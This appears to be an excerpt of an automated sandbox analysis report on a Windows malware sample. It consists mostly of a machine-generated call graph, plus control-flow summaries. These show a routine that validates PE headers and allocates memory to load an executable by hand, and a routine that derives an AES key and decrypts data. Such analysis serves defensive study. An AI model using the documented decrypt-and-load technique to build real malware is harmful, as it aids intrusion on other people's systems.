40166->40172 40648 4065e0 39 API calls 2 library calls 40167->40648 40168 405be1 40179 4022d0 27 API calls 40168->40179 40169 405caf 40177 4022d0 27 API calls 40169->40177 40653 4066f0 39 API calls 2 library calls 40170->40653 40175 405a86 40172->40175 40174 405b79 40182 4022d0 27 API calls 40174->40182 40645 401710 CoUninitialize 40175->40645 40176 405b1c 40183 4022d0 27 API calls 40176->40183 40180 405cbf 40177->40180 40181 405bf1 40179->40181 40189 402200 25 API calls 40180->40189 40658 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40181->40658 40185 405b89 40182->40185 40186 405b2c 40183->40186 40654 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40185->40654 40649 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40186->40649 40187 405bfa 40188 402200 25 API calls 40187->40188 40193 405c02 40188->40193 40194 405cd3 40189->40194 40192 405b35 40196 402200 25 API calls 40192->40196 40659 406870 39 API calls 2 library calls 40193->40659 40375 405d94 40194->40375 40666 406b90 39 API calls 2 library calls 40194->40666 40195 405b92 40198 402200 25 API calls 40195->40198 40199 405b3d 40196->40199 40203 405b9a 40198->40203 40650 408440 27 API calls 40199->40650 40200 405c07 40208 4022d0 27 API calls 40200->40208 40655 408440 27 API calls 40203->40655 40205 405ce0 40210 4022d0 27 API calls 40205->40210 40206 405d9e 40211 4022d0 27 API calls 40206->40211 40209 405c17 40208->40209 40660 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40209->40660 40215 405cf0 40210->40215 40216 405dae 40211->40216 40213 406136 40556 407c30 40213->40556 40667 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40215->40667 40223 402200 25 API calls 40216->40223 40218 405c20 40221 402200 25 API calls 40218->40221 40220 40613f 40230 4022d0 27 API calls 40220->40230 40224 405c28 40221->40224 40222 405cf9 40225 402200 25 API calls 40222->40225 40227 405dc2 40223->40227 40661 4068f0 39 API calls 2 library calls 40224->40661 40226 405d01 40225->40226 40668 406c10 39 API calls 2 library calls 40226->40668 40456 405ea9 40227->40456 40675 406f30 39 API calls 2 library calls 40227->40675 40234 406152 40230->40234 40231 405c2d 40239 4022d0 27 API calls 40231->40239 40232 405d06 40242 4022d0 27 API calls 40232->40242 40566 407bb0 40234->40566 40236 405eb3 40243 4022d0 27 API calls 40236->40243 40237 405dcf 40245 4022d0 27 API calls 40237->40245 40241 405c3d 40239->40241 40240 40615d 40249 4022d0 27 API calls 40240->40249 40250 402200 25 API calls 40241->40250 40244 405d16 40242->40244 40246 405ec3 40243->40246 40669 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40244->40669 40248 405ddf 40245->40248 40260 402200 25 API calls 40246->40260 40676 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40248->40676 40253 406170 40249->40253 40254 405c51 40250->40254 40251 405d1f 40255 402200 25 API calls 40251->40255 40576 407b10 40253->40576 40258 405c72 40254->40258 40259 405c55 40254->40259 40261 405d27 40255->40261 40256 405de8 40262 402200 25 API calls 40256->40262 40663 406a00 39 API calls 2 library calls 40258->40663 40662 406980 39 API calls 2 library calls 40259->40662 40265 405ed7 40260->40265 40670 406c90 39 API calls 2 library calls 40261->40670 40267 405df0 40262->40267 40263 40617b 40274 4022d0 27 API calls 40263->40274 40269 405f59 40265->40269 40270 405edb 40265->40270 40677 406fb0 39 API calls 2 library calls 40267->40677 40692 4074f0 39 API calls 2 library calls 40269->40692 40686 407360 39 API calls 2 library calls 40270->40686 40271 405d2c 40285 4022d0 27 API calls 40271->40285 40273 405c77 40282 4022d0 27 API calls 40273->40282 40278 40618e 40274->40278 40277 405df5 40287 4022d0 27 API calls 40277->40287 40586 408560 40278->40586 40279 405c5a 40284 4022d0 27 API calls 40279->40284 40280 405f5e 40292 4022d0 27 API calls 40280->40292 40281 405ee0 40293 4022d0 27 API calls 40281->40293 40288 405c87 40282->40288 40470 405c6a 40284->40470 40286 405d3c 40285->40286 40300 402200 25 API calls 40286->40300 40290 405e05 40287->40290 40302 402200 25 API calls 40288->40302 40678 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40290->40678 40297 405f6e 40292->40297 40298 405ef0 40293->40298 40295 4061bb 40594 408670 40295->40594 40311 402200 25 API calls 40297->40311 40687 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40298->40687 40306 405d50 40300->40306 40301 405e0e 40307 402200 25 API calls 40301->40307 40308 405c9b 40302->40308 40304 40611b 40310 402200 25 API calls 40304->40310 40305 405ef9 40312 402200 25 API calls 40305->40312 40313 405d54 40306->40313 40314 405d5e 40306->40314 40315 405e16 40307->40315 40413 405b49 40308->40413 40664 406a90 39 API calls 2 library calls 40308->40664 40310->40413 40317 405f82 40311->40317 40318 405f01 40312->40318 40671 406d20 39 API calls 2 library calls 40313->40671 40672 406da0 39 API calls 2 library calls 40314->40672 40679 407030 39 API calls 2 library calls 40315->40679 40316 4085c0 27 API calls 40323 4061e8 40316->40323 40324 406004 40317->40324 40325 405f86 40317->40325 40688 4073e0 39 API calls 2 library calls 40318->40688 40329 408670 27 API calls 40323->40329 40699 407700 39 API calls 2 library calls 40324->40699 40693 407580 39 API calls 2 library calls 40325->40693 40327 405e1b 40337 4022d0 27 API calls 40327->40337 40328 405d63 40338 4022d0 27 API calls 40328->40338 40333 4061fd 40329->40333 40332 405f06 40340 4022d0 27 API calls 40332->40340 40336 4085c0 27 API calls 40333->40336 40334 406009 40345 4022d0 27 API calls 40334->40345 40335 405f8b 40346 4022d0 27 API calls 40335->40346 40339 406215 40336->40339 40341 405e2b 40337->40341 40342 405d73 40338->40342 40343 402200 25 API calls 40339->40343 40347 405f16 40340->40347 40680 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40341->40680 40354 402200 25 API calls 40342->40354 40344 406223 40343->40344 40349 402200 25 API calls 40344->40349 40350 406019 40345->40350 40351 405f9b 40346->40351 40689 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40347->40689 40355 40622e 40349->40355 40366 402200 25 API calls 40350->40366 40694 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40351->40694 40353 405e34 40358 402200 25 API calls 40353->40358 40360 405d87 40354->40360 40361 402200 25 API calls 40355->40361 40357 405f1f 40363 402200 25 API calls 40357->40363 40359 405e3c 40358->40359 40681 4070b0 39 API calls 2 library calls 40359->40681 40360->40413 40673 406e30 39 API calls 2 library calls 40360->40673 40365 406239 40361->40365 40362 405fa4 40367 402200 25 API calls 40362->40367 40368 405f27 40363->40368 40371 402200 25 API calls 40365->40371 40372 40602d 40366->40372 40373 405fac 40367->40373 40690 407470 39 API calls 2 library calls 40368->40690 40369 405e41 40385 4022d0 27 API calls 40369->40385 40376 406244 40371->40376 40377 406031 40372->40377 40378 406084 40372->40378 40695 407600 39 API calls 2 library calls 40373->40695 40674 406eb0 39 API calls 2 library calls 40375->40674 40382 402200 25 API calls 40376->40382 40700 407790 39 API calls 2 library calls 40377->40700 40705 407910 39 API calls 2 library calls 40378->40705 40380 405f2c 40389 4022d0 27 API calls 40380->40389 40387 40624f 40382->40387 40384 405fb1 40392 4022d0 27 API calls 40384->40392 40390 405e51 40385->40390 40386 406089 40398 4022d0 27 API calls 40386->40398 40391 402200 25 API calls 40387->40391 40388 406036 40395 4022d0 27 API calls 40388->40395 40393 405f3c 40389->40393 40403 402200 25 API calls 40390->40403 40394 40625a 40391->40394 40396 405fc1 40392->40396 40691 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40393->40691 40399 402200 25 API calls 40394->40399 40400 406046 40395->40400 40696 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40396->40696 40404 406099 40398->40404 40405 406265 40399->40405 40701 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40400->40701 40402 405f45 40408 402200 25 API calls 40402->40408 40409 405e65 40403->40409 40419 402200 25 API calls 40404->40419 40410 402200 25 API calls 40405->40410 40407 405fca 40412 402200 25 API calls 40407->40412 40408->40413 40414 405e6e 40409->40414 40682 407140 39 API calls 2 library calls 40409->40682 40454 406274 40410->40454 40411 40604f 40416 402200 25 API calls 40411->40416 40417 405fd2 40412->40417 40552 4016b0 40413->40552 40683 4071c0 39 API calls 2 library calls 40414->40683 40421 406057 40416->40421 40697 407680 39 API calls 2 library calls 40417->40697 40423 4060ad 40419->40423 40420 405e78 40429 4022d0 27 API calls 40420->40429 40702 407810 39 API calls 2 library calls 40421->40702 40423->40413 40706 407990 39 API calls 2 library calls 40423->40706 40425 405fd7 40432 4022d0 27 API calls 40425->40432 40427 40605c 40433 4022d0 27 API calls 40427->40433 40428 4060b6 40435 4022d0 27 API calls 40428->40435 40431 405e88 40429->40431 40430 4062d9 Sleep 40430->40454 40440 402200 25 API calls 40431->40440 40434 405fe7 40432->40434 40436 40606c 40433->40436 40698 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40434->40698 40438 4060c6 40435->40438 40703 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40436->40703 40707 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40438->40707 40439 4022d0 27 API calls 40439->40454 40445 405e9c 40440->40445 40442 405ff0 40443 402200 25 API calls 40442->40443 40443->40413 40445->40413 40684 407250 39 API calls 2 library calls 40445->40684 40446 406075 40447 402200 25 API calls 40446->40447 40449 40607d 40447->40449 40448 4060cf 40450 402200 25 API calls 40448->40450 40704 407890 39 API calls 2 library calls 40449->40704 40453 4060d7 40450->40453 40708 407a10 39 API calls 2 library calls 40453->40708 40454->40430 40454->40439 40455 4062e2 40454->40455 40462 4062d1 40454->40462 40457 402200 25 API calls 40455->40457 40685 4072d0 39 API calls 2 library calls 40456->40685 40459 4062ea 40457->40459 40597 408490 40459->40597 40460 4060dc 40468 4022d0 27 API calls 40460->40468 40465 402200 25 API calls 40462->40465 40463 4062fe 40466 408490 27 API calls 40463->40466 40464 406082 40467 4022d0 27 API calls 40464->40467 40465->40430 40469 406317 40466->40469 40467->40470 40471 4060ec 40468->40471 40473 408490 27 API calls 40469->40473 40711 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40470->40711 40709 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40471->40709 40478 40632a 40473->40478 40474 4060f5 40475 402200 25 API calls 40474->40475 40476 4060fd 40475->40476 40710 407a90 39 API calls 2 library calls 40476->40710 40480 408490 27 API calls 40478->40480 40482 406352 40478->40482 40480->40482 40481 40635f 40483 4022d0 27 API calls 40481->40483 40712 407cc0 39 API calls 2 library calls 40482->40712 40484 40636f 40483->40484 40485 402200 25 API calls 40484->40485 40486 406383 40485->40486 40487 406420 40486->40487 40489 4016b0 27 API calls 40486->40489 40715 407e30 39 API calls 2 library calls 40487->40715 40491 40639e 40489->40491 40490 406425 40494 4022d0 27 API calls 40490->40494 40713 407d50 39 API calls 2 library calls 40491->40713 40493 4063a7 40496 4022d0 27 API calls 40493->40496 40495 406438 40494->40495 40497 402200 25 API calls 40495->40497 40499 4063b7 40496->40499 40498 40644f 40497->40498 40523 4064af 40498->40523 40716 407fa0 39 API calls 2 library calls 40498->40716 40504 4063e7 40499->40504 40505 4063d8 Sleep 40499->40505 40501 4037d0 39 API calls 40503 4064c0 40501->40503 40502 406460 40507 4022d0 27 API calls 40502->40507 40511 4022d0 27 API calls 40504->40511 40505->40499 40506 4063e5 40505->40506 40508 406409 40506->40508 40510 40646f 40507->40510 40509 402200 25 API calls 40508->40509 40513 406411 40509->40513 40717 407f20 39 API calls 2 library calls 40510->40717 40512 4063fe 40511->40512 40515 402200 25 API calls 40512->40515 40714 401710 CoUninitialize 40513->40714 40515->40508 40517 406483 40518 4022d0 27 API calls 40517->40518 40519 406492 40518->40519 40718 407ec0 39 API calls __Init_thread_footer 40519->40718 40521 4064a0 40522 4022d0 27 API calls 40521->40522 40522->40523 40523->40501 40719 40f188 40524->40719 40526 40560f 40527 40f042 40526->40527 40730 4111fd GetLastError 40527->40730 40531 4064fc 40530->40531 40539 40652e 40530->40539 40767 409170 6 API calls 40531->40767 40532 408ec2 CatchGuardHandler 5 API calls 40534 406540 40532->40534 40534->40118 40535 406506 40535->40539 40768 409482 28 API calls 40535->40768 40537 406524 40769 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40537->40769 40539->40532 40541 4022f3 40540->40541 40541->40541 40542 402470 27 API calls 40541->40542 40543 402305 40542->40543 40543->40121 40545 40220b 40544->40545 40546 402226 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40544->40546 40545->40546 40547 40c26f 25 API calls 40545->40547 40546->40125 40548 40224a 40547->40548 40549 402281 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40548->40549 40550 40c26f 25 API calls 40548->40550 40549->40125 40551 4022cc 40550->40551 40553 4016c3 __cftof 40552->40553 40554 409035 27 API calls 40553->40554 40555 4016da __cftof 40554->40555 40555->40213 40557 407c62 40556->40557 40565 407c9e 40556->40565 40770 409170 6 API calls 40557->40770 40559 408ec2 CatchGuardHandler 5 API calls 40561 407cb0 40559->40561 40560 407c6c 40560->40565 40771 409482 28 API calls 40560->40771 40561->40220 40563 407c94 40772 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40563->40772 40565->40559 40567 407c0e 40566->40567 40568 407bdc 40566->40568 40570 408ec2 CatchGuardHandler 5 API calls 40567->40570 40773 409170 6 API calls 40568->40773 40572 407c20 40570->40572 40571 407be6 40571->40567 40774 409482 28 API calls 40571->40774 40572->40240 40574 407c04 40775 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40574->40775 40577 407b4d 40576->40577 40585 407b92 40576->40585 40776 409170 6 API calls 40577->40776 40579 408ec2 CatchGuardHandler 5 API calls 40580 407ba5 40579->40580 40580->40263 40581 407b57 40581->40585 40777 409482 28 API calls 40581->40777 40583 407b88 40778 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 40583->40778 40585->40579 40587 408572 40586->40587 40588 408a60 27 API calls 40587->40588 40589 4061a3 40588->40589 40590 4085c0 40589->40590 40591 4085d9 40590->40591 40593 4085ed __InternalCxxFrameHandler 40591->40593 40779 402740 27 API calls 3 library calls 40591->40779 40593->40295 40780 408880 40594->40780 40596 4061d0 40596->40316 40598 4084bb 40597->40598 40599 4084c2 40598->40599 40600 408514 40598->40600 40601 4084f5 40598->40601 40599->40463 40608 408509 __InternalCxxFrameHandler 40600->40608 40802 401600 27 API calls 3 library calls 40600->40802 40602 40854a 40601->40602 40603 4084fc 40601->40603 40803 401600 27 API calls 2 library calls 40602->40803 40801 401600 27 API calls 3 library calls 40603->40801 40607 408502 40607->40608 40609 40c26f 25 API calls 40607->40609 40608->40463 40610 408554 40609->40610 40611->40138 40612->40138 40613->40138 40614->40138 40616 408ae8 40615->40616 40619 408a7a __InternalCxxFrameHandler 40615->40619 40804 408b10 27 API calls 3 library calls 40616->40804 40618 408afa 40618->40138 40619->40138 40621 401db2 40620->40621 40621->40621 40622 402470 27 API calls 40621->40622 40623 401dc5 40622->40623 40624 402470 27 API calls 40623->40624 40625 401e8d __InternalCxxFrameHandler 40624->40625 40805 40c34c 40625->40805 40628 402033 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40629 408ec2 CatchGuardHandler 5 API calls 40628->40629 40631 402057 40629->40631 40630 401fc3 40630->40628 40632 402062 40630->40632 40631->40138 40633 40c26f 25 API calls 40632->40633 40634 402067 40633->40634 40635 401d60 39 API calls 40634->40635 40637 40f00b 23 API calls 40636->40637 40638 4037d7 40637->40638 40834 4082a0 27 API calls 3 library calls 40638->40834 40640 4038a1 40640->40146 40642 403844 40642->40640 40835 40f021 37 API calls _unexpected 40642->40835 40836 408740 27 API calls 3 library calls 40642->40836 40644->40154 40646->40137 40647->40155 40648->40176 40649->40192 40650->40413 40651->40140 40652->40159 40653->40174 40654->40195 40655->40413 40656->40131 40657->40168 40658->40187 40659->40200 40660->40218 40661->40231 40662->40279 40663->40273 40664->40279 40665->40169 40666->40205 40667->40222 40668->40232 40669->40251 40670->40271 40671->40279 40672->40328 40673->40375 40674->40206 40675->40237 40676->40256 40677->40277 40678->40301 40679->40327 40680->40353 40681->40369 40682->40414 40683->40420 40684->40456 40685->40236 40686->40281 40687->40305 40688->40332 40689->40357 40690->40380 40691->40402 40692->40280 40693->40335 40694->40362 40695->40384 40696->40407 40697->40425 40698->40442 40699->40334 40700->40388 40701->40411 40702->40427 40703->40446 40704->40464 40705->40386 40706->40428 40707->40448 40708->40460 40709->40474 40710->40464 40711->40304 40712->40481 40713->40493 40715->40490 40716->40502 40717->40517 40718->40521 40720 40f197 40719->40720 40721 40f1ac 40719->40721 40727 40c339 14 API calls __dosmaperr 40720->40727 40726 40f1a7 __alldvrm 40721->40726 40729 411df2 6 API calls __dosmaperr 40721->40729 40723 40f19c 40728 40c25f 25 API calls __cftof 40723->40728 40726->40526 40727->40723 40728->40726 40729->40726 40731 411214 40730->40731 40737 41121a 40730->40737 40759 411d71 6 API calls __dosmaperr 40731->40759 40734 411238 40735 411220 SetLastError 40734->40735 40736 41123c 40734->40736 40743 4112b4 40735->40743 40744 405618 Sleep 40735->40744 40761 411a65 14 API calls __dosmaperr 40736->40761 40737->40735 40760 411db0 6 API calls __dosmaperr 40737->40760 40740 411248 40741 411250 40740->40741 40742 411267 40740->40742 40762 411db0 6 API calls __dosmaperr 40741->40762 40763 411db0 6 API calls __dosmaperr 40742->40763 40766 40fad9 37 API calls __FrameHandler3::FrameUnwindToState 40743->40766 40744->40110 40748 411273 40751 411277 40748->40751 40752 411288 40748->40752 40749 41125e 40755 411ac2 _free 14 API calls 40749->40755 40764 411db0 6 API calls __dosmaperr 40751->40764 40765 41102b 14 API calls __dosmaperr 40752->40765 40757 411264 40755->40757 40756 411293 40758 411ac2 _free 14 API calls 40756->40758 40757->40735 40758->40757 40759->40737 40760->40734 40761->40740 40762->40749 40763->40748 40764->40749 40765->40756 40767->40535 40768->40537 40769->40539 40770->40560 40771->40563 40772->40565 40773->40571 40774->40574 40775->40567 40776->40581 40777->40583 40778->40585 40779->40593 40781 4088c3 40780->40781 40782 408a50 40781->40782 40783 408990 40781->40783 40789 4088c8 __InternalCxxFrameHandler 40781->40789 40799 4016a0 27 API calls std::_Xinvalid_argument 40782->40799 40786 4089c5 40783->40786 40787 4089eb 40783->40787 40785 408a55 40800 401600 27 API calls 2 library calls 40785->40800 40786->40785 40790 4089d0 40786->40790 40796 4089dd __InternalCxxFrameHandler 40787->40796 40798 401600 27 API calls 3 library calls 40787->40798 40789->40596 40797 401600 27 API calls 3 library calls 40790->40797 40791 4089d6 40794 40c26f 25 API calls 40791->40794 40791->40796 40795 408a5f 40794->40795 40796->40596 40797->40791 40798->40796 40800->40791 40801->40607 40802->40608 40803->40607 40804->40618 40808 41144f 40805->40808 40812 411463 40808->40812 40809 411467 40825 401ed8 InternetOpenA 40809->40825 40827 40c339 14 API calls __dosmaperr 40809->40827 40811 411491 40828 40c25f 25 API calls __cftof 40811->40828 40812->40809 40813 4114a1 40812->40813 40812->40825 40829 40c369 37 API calls 2 library calls 40813->40829 40816 4114ad 40817 4114b7 40816->40817 40821 4114ce 40816->40821 40830 417a24 25 API calls 2 library calls 40817->40830 40819 411550 40819->40825 40831 40c339 14 API calls __dosmaperr 40819->40831 40820 4115a5 40820->40825 40833 40c339 14 API calls __dosmaperr 40820->40833 40821->40819 40821->40820 40824 411599 40832 40c25f 25 API calls __cftof 40824->40832 40825->40630 40827->40811 40828->40825 40829->40816 40830->40825 40831->40824 40832->40825 40833->40825 40834->40642 40835->40642 40836->40642 40838 40eeb7 40837->40838 40839 40eec9 40837->40839 40865 409906 GetModuleHandleW 40838->40865 40849 40ed50 40839->40849 40842 40eebc 40842->40839 40866 40ef4f GetModuleHandleExW 40842->40866 40844 4096cf 40844->40090 40848 40ef0c 40850 40ed5c CallCatchBlock 40849->40850 40872 40f28c RtlEnterCriticalSection 40850->40872 40852 40ed66 40873 40edbc 40852->40873 40854 40ed73 40877 40ed91 40854->40877 40857 40ef0d 40882 41366f GetPEB 40857->40882 40860 40ef3c 40863 40ef4f __FrameHandler3::FrameUnwindToState 3 API calls 40860->40863 40861 40ef1c GetPEB 40861->40860 40862 40ef2c GetCurrentProcess TerminateProcess 40861->40862 40862->40860 40864 40ef44 ExitProcess 40863->40864 40865->40842 40867 40ef91 40866->40867 40868 40ef6e GetProcAddress 40866->40868 40869 40eec8 40867->40869 40870 40ef97 FreeLibrary 40867->40870 40871 40ef83 40868->40871 40869->40839 40870->40869 40871->40867 40872->40852 40874 40edc8 CallCatchBlock 40873->40874 40875 40ee29 __FrameHandler3::FrameUnwindToState 40874->40875 40880 410940 14 API calls __FrameHandler3::FrameUnwindToState 40874->40880 40875->40854 40881 40f2d4 RtlLeaveCriticalSection 40877->40881 40879 40ed7f 40879->40844 40879->40857 40880->40875 40881->40879 40883 413689 40882->40883 40885 40ef17 40882->40885 40886 411c94 5 API calls __dosmaperr 40883->40886 40885->40860 40885->40861 40886->40885

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 402c70-402c92 1 402c94-402cbb SetLastError call 402920 call 408ec2 0->1 2 402cbc-402cc4 0->2 4 402cf1-402cff 2->4 5 402cc6 2->5 6 402d01-402d28 SetLastError call 402920 call 408ec2 4->6 7 402d29-402d36 4->7 9 402ccb-402cf0 call 402920 SetLastError call 408ec2 5->9 11 402d38-402d3d 7->11 12 402d3f-402d48 7->12 11->9 17 402d54-402d5a 12->17 18 402d4a-402d4f 12->18 22 402d66-402d73 17->22 23 402d5c-402d61 17->23 18->9 26 402d94-402db7 GetNativeSystemInfo 22->26 27 402d75 22->27 23->9 29 402dc3-402ddb VirtualAlloc 26->29 30 402db9-402dbe 26->30 28 402d77-402d92 27->28 28->26 28->28 31 402e03-402e1e GetProcessHeap HeapAlloc 29->31 32 402ddd-402ded VirtualAlloc 29->32 30->9 34 402e20-402e2d VirtualFree 31->34 35 402e34-402e7a 31->35 32->31 33 402def-402dfc call 402920 32->33 33->31 34->35 37 402e7c-402e7e SetLastError 35->37 38 402e9e-402ee6 VirtualAlloc call 40a3e0 35->38 41 402e84-402e9d call 4033d0 call 408ec2 37->41 45 402eec-402eef 38->45 46 402f9f-402fa8 38->46 48 402ef0-402ef5 45->48 49 40302d 46->49 50 402fae-402fb5 46->50 53 402ef7-402f03 48->53 54 402f38-402f40 48->54 52 403032-40303e call 402a80 49->52 55 402fb7-402fb9 50->55 56 402fbb-402fcd 50->56 52->41 66 403044-403067 52->66 59 402f84-402f96 53->59 60 402f05-402f1f 53->60 54->37 57 402f46-402f59 call 402bf0 54->57 55->52 56->49 61 402fcf 56->61 65 402f5b-402f60 57->65 59->48 63 402f9c 59->63 60->41 75 402f25-402f36 call 40aa10 60->75 64 402fd0-402fe5 61->64 63->46 68 402fe7-402fea 64->68 69 40301e-403028 64->69 65->41 71 402f66-402f7b call 40a3e0 65->71 73 403069-40306e 66->73 74 40307c-40309c 66->74 70 402ff0-403001 68->70 69->64 72 40302a 69->72 76 403003-40300b 70->76 77 40300e-40301c 70->77 92 402f7e-402f81 71->92 72->49 79 403070-403073 73->79 80 403075-403077 73->80 82 4030a2-4030a8 74->82 83 403165-403171 call 402950 74->83 75->92 76->77 77->69 77->70 79->74 80->74 87 403079 80->87 84 4030b0-4030c9 82->84 91 403176-403178 83->91 89 4030e3-4030e6 84->89 90 4030cb-4030ce 84->90 87->74 96 403123-40312f 89->96 97 4030e8-4030ef 89->97 93 4030d0-4030d3 90->93 94 4030d5-4030d8 90->94 91->41 95 40317e-40318a 91->95 92->59 98 4030dd-4030e0 93->98 94->89 99 4030da 94->99 100 4031b3-4031b8 95->100 101 40318c-403195 95->101 104 403131 96->104 105 403137-403140 96->105 102 403120 97->102 103 4030f1-4030f6 call 402950 97->103 98->89 99->98 109 40320a-403223 call 408ec2 100->109 110 4031ba-4031c3 100->110 101->100 107 403197-40319b 101->107 102->96 112 4030fb-4030fd 103->112 104->105 106 403143-40315f 105->106 106->83 106->84 107->100 111 40319d 107->111 114 4031f4-403209 call 408ec2 110->114 115 4031c5-4031ce 110->115 117 4031a0-4031af 111->117 112->41 118 403103-40311e 112->118 122 4031d0 115->122 123 4031da-4031f3 call 408ec2 115->123 126 4031b1 117->126 118->106 122->123 126->100
                                                                                APIs
                                                                                • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                                                                • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                                                                Strings
                                                                                • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                                                                • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                                                                • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                                                                • Size is not valid!, xrefs: 00402C9C
                                                                                • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                                                                • DOS header is not valid!, xrefs: 00402CC6
                                                                                • Section alignment invalid!, xrefs: 00402D5C
                                                                                • @, xrefs: 00402C8F
                                                                                • DOS header size is not valid!, xrefs: 00402D09
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                                                • API String ID: 1452528299-393758929
                                                                                • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                                                • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                                                                • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                                                • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 855 4034c0-403548 CryptAcquireContextW 856 40360a-403620 GetLastError CryptReleaseContext 855->856 857 40354e-40356c CryptCreateHash 855->857 858 403754-40375a 856->858 857->856 859 403572-403585 857->859 860 403784-4037a1 call 408ec2 858->860 861 40375c-403768 858->861 862 403588-40358d 859->862 863 40377a-403781 call 409027 861->863 864 40376a-403778 861->864 862->862 865 40358f-4035d6 call 409035 call 40e46b CryptHashData 862->865 863->860 864->863 867 4037a2-4037b5 call 40c26f 864->867 879 4035e6-403608 CryptDeriveKey 865->879 880 4035d8-4035e1 GetLastError 865->880 877 4037b7-4037be 867->877 878 4037c8 867->878 877->878 884 4037c0-4037c4 877->884 879->856 881 403625-403626 call 40e2bd 879->881 880->858 885 40362b-403677 call 40a3e0 call 409035 881->885 884->878 890 403748-40374e CryptDestroyKey 885->890 891 40367d-40368c 885->891 890->858 892 403692-40369b 891->892 893 4036a9-4036e4 call 40a3e0 CryptDecrypt 892->893 894 40369d-40369f 892->894 893->890 897 4036e6-403711 call 40a3e0 893->897 894->893 897->890 900 403713-403742 897->900 900->890 900->892
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,B23C9C44), ref: 00403540
                                                                                • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                                                                • _mbstowcs.LIBCMT ref: 004035B7
                                                                                • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                                                                • GetLastError.KERNEL32 ref: 004035D8
                                                                                • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                                                                • GetLastError.KERNEL32 ref: 0040360A
                                                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                                                                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                                                                • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                                                                Strings
                                                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2420326936.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2420326936.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_dI3n4LSHB7.jbxd
                                                                                Similarity
                                                                                • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                                • API String ID: 3642901890-63410773
                                                                                • Opcode ID: a0ff43f580afe8f3995dcde7a2644c92267f14c521f0fca859abd751efac2b0a
